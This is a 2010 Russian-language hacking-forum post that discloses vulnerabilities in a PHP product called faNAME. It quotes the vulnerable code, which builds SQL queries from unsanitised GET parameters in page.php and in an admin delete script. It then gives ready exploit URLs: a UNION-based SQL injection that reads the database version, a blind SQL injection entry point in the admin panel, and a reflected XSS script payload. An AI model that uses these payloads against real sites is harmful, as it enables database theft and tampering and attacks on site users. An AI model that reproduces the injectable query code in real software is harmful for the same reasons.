Показать сообщение отдельно

  #327  
Старый 12.03.2010, 12:01
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

faNAME
product : en.faname

SQL injection
1. mq = off
page.php - уязвимость в коде файла /class/page.php к которому обращается файл
Code :
PHP код:
$id $_GET['id'];
$kind "id";
$result mysql_query("SELECT * FROM blog WHERE $kind LIKE '$id' order by id DESC LIMIT 1");
while(
$r=mysql_fetch_array($result)) 
result :
Код:
http://localhost/en.faname/page.php?id=2'+and+0+union+all+select+1,version(),3,4--+
Blind sql
2. admin panel
/admin/del.page.php
PHP код:
if($_GET["cmd"]=="delete")
{
$id $_GET['id'];

$sql "DELETE FROM blog WHERE id=$id";
$result mysql_query($sql); 
result :
Код:
http://localhost/en.faname/admin/del.page.php?cmd=delete&id={blind sql}
Passive XSS
mq = off
Код:
http://localhost/en.faname/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
 
Ответить с цитированием